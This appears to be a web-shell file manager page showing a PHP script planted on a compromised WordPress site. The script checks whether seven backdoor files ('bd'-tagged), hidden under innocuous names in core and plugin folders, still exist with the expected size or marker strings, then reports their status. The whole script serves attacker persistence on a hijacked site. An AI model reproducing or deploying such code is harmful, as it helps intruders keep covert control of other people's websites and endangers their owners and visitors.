OwlCyberSecurity - MANAGER
Edit File: .dat
<?php $r = '/home/bethenfy/onemiletotravel.com'; $x = ["/wp-includes/version.php"=>"bd@@142247231@@request_approved", "/wp-includes/SimplePie/library/SimplePie/XML/Declaration/vera.php"=>"bd@@142226925@@1017", "/wp-content/plugins/extendify/app/Shared/DataProvider/OutputFilter.php"=>"bd@@142226943@@2180", "/wp-includes/sodium_compat/namespaced/Core/Template.in.php"=>"bd@@142226650@@1968", "/wp-content/plugins/litespeed-cache/tpl/cdn/auto.tpl.php"=>"bd@@142227049@@536", "/wp-includes/html-api/class-wp-html-tag-processor.php"=>"bd@@142226884@@config_manager", "/wp-includes/sodium_compat/namespaced/Core/ChaCha20/charts.php"=>"bd@@142227036@@1967"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');